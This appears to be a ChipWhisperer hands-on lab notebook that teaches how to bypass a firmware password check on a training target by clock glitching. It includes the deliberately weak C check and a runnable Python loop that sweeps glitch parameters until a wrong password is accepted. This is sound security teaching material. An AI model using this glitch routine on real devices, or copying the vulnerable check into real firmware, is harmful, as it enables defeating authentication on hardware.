# Part 1, Topic 2: Clock Glitching to Bypass Password

---
NOTE: This lab references some (commercial) training material on [ChipWhisperer.io](https://www.ChipWhisperer.io). You can freely execute and use the lab per the open-source license (including using it in your own courses if you distribute similarly), but you must maintain notice about this source location. Consider joining our training course to enjoy the full experience.

---

**SUMMARY:** *In the previous lab, we learned how clock glitching can be used to cause a target to behave unexpectedly. In this lab, we'll look at a slightly more realistic example - glitching past a password check*

**LEARNING OUTCOMES:**

* Applying previous glitch settings to new firmware
* Checking for success and failure when glitching

## Firmware

We've already seen how we can insert clock gliches to mess up a calculation that a target is trying to make. While this has many applications, some which will be covered in Fault_201, let's take a look at something a little closer to our original example of glitch vulnerable code: a password check. No need to change out firmware here, we're still using the simpleserial-glitch project (though we'll go through all the build stuff again).

The code is as follows for the password check:

```C
uint8_t password(uint8_t* pw)
{
    char passwd[] = "touch";
    char passok = 1;
    int cnt;

    trigger_high();

    //Simple test - doesn't check for too-long password!
    for(cnt = 0; cnt < 5; cnt++){
        if (pw[cnt] != passwd[cnt]){
            passok = 0;
        }
    }
    
    trigger_low();
    
    simpleserial_put('r', 1, (uint8_t*)&passok);
    return passok;
}
```

There's really nothing out of the ordinary here - it's just a simple password check. We can communicate with it using the `'p'` command.

In [ ]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEARM'
SS_VER = 'SS_VER_2_1'

In [ ]:
%run "../../Setup_Scripts/Setup_Generic.ipynb"

In [ ]:
%%bash -s "$PLATFORM" "$SS_VER"
cd ../../../hardware/victims/firmware/simpleserial-glitch
make PLATFORM=$1 CRYPTO_TARGET=NONE SS_VER=$2 -j

In [ ]:
fw_path = "../../../hardware/victims/firmware/simpleserial-glitch/simpleserial-glitch-{}.hex".format(PLATFORM)
cw.program_target(scope, prog, fw_path)
if SS_VER == 'SS_VER_2_1':
    target.reset_comms()

In [ ]:
def reboot_flush():
    reset_target(scope)
    #Flush garbage too
    target.flush()

If we send a wrong password:

In [ ]:
#Do glitch loop
pw = bytearray([0x00]*5)
target.simpleserial_write('p', pw)

val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10)#For loop check
valid = val['valid']
if valid:
    response = val['payload']
    raw_serial = val['full_response']
    error_code = val['rv']

print(val)
#print(bytearray(val['full_response'].encode('latin-1')))

We get a response of zero. But if we send the correct password:

In [ ]:
#Do glitch loop
pw = bytearray([0x74, 0x6F, 0x75, 0x63, 0x68]) # correct password ASCII representation
target.simpleserial_write('p', pw)

val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10)#For loop check
valid = val['valid']
if valid:
    response = val['payload']
    raw_serial = val['full_response']
    error_code = val['rv']

print(val)

We get a 1 back. Set the glitch up as in the previous part:

In [ ]:
scope.cglitch_setup()

Update the code below to also add an ext offset parameter:

In [ ]:
gc = cw.GlitchController(groups=["success", "reset", "normal"], parameters=["width", "offset", "ext_offset"])
gc.display_stats()

Like before, we'll plot our settings. The plot is 2D, so you'll need to make a decision about what to plot. In this case, we'll plot offset and ext_offset, but pick whichever you like:

In [ ]:
gc.glitch_plot(plotdots={"success":"+g", "reset":"xr", "normal":None}, x_index="ext_offset", y_index="offset")

And make a glitch loop. Make sure you use some successful settings that you found in the previous lab, since it will make this one much shorter!

One change you probably want to make is to add a scan for ext_offset. The number of places we can insert a successful glitch has gone way down. Doing this will also be very important for future labs.

In [ ]:
from tqdm.notebook import tqdm
import re
import struct
sample_size = 1

if scope._is_husky:
    gc.set_range("width", 3500, 4500)
    gc.set_range("offset", 1300, 3200)
    gc.set_global_step([400, 200, 100])
    gc.set_range("ext_offset", 60, 100)
    gc.set_step("ext_offset", 1)
else:
    gc.set_global_step(1)
    if PLATFORM == "CWLITEXMEGA":
        gc.set_range("width", 45, 49.8)
        gc.set_range("offset", -46, -49.8)
        gc.set_range("ext_offset", 4, 70)
        sample_size = 10
    elif PLATFORM == "CW308_STM32F4":
        gc.set_range("width", 0.4, 10)
        gc.set_range("offset", 40, 49.8)
    elif PLATFORM == "CWLITEARM":
        gc.set_range("width", 0.8, 3.6)
        gc.set_range("offset", -4, -2)
        gc.set_range("ext_offset", 0, 100)
        gc.set_global_step(0.4)

gc.set_step("ext_offset", 1)
scope.glitch.repeat = 1
reboot_flush()
broken = False
scope.adc.timeout = 0.5

for glitch_settings in gc.glitch_values():
    scope.glitch.offset = glitch_settings[1]
    scope.glitch.width = glitch_settings[0]
    scope.glitch.ext_offset = glitch_settings[2]
    for i in range(sample_size):
        if scope.adc.state:
            # can detect crash here (fast) before timing out (slow)
            print("Trigger still high!")
            gc.add("reset")
            
            #Device is slow to boot?
            reboot_flush()

        scope.arm()
        target.simpleserial_write('p', bytearray([0]*5))

        ret = scope.capture()

        if ret:
            print('Timeout - no trigger')
            gc.add("reset")

            #Device is slow to boot?
            reboot_flush()

        else:
            val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10, timeout=50)#For loop check
            if val['valid'] is False:
                gc.add("reset")
            else:

                if val['payload'] == bytearray([1]): #for loop check
                    #broken = True
                    gc.add("success")
                    print(val['payload'])
                    print(scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset)
                    print("🐙", end="")
                    #break
                else:
                    gc.add("normal")
    if broken:
        break

For this lab, you may want two copies of your results; one for finding effective ext_offsets:

In [ ]:
results = gc.calc(ignore_params=["width", "offset"], sort="success_rate")
results

And one for your width/offset settings:

In [ ]:
results = gc.calc(ignore_params=["ext_offset"], sort="success_rate")
results

In [ ]:
scope.dis()
target.dis()

In [ ]:
assert broken is True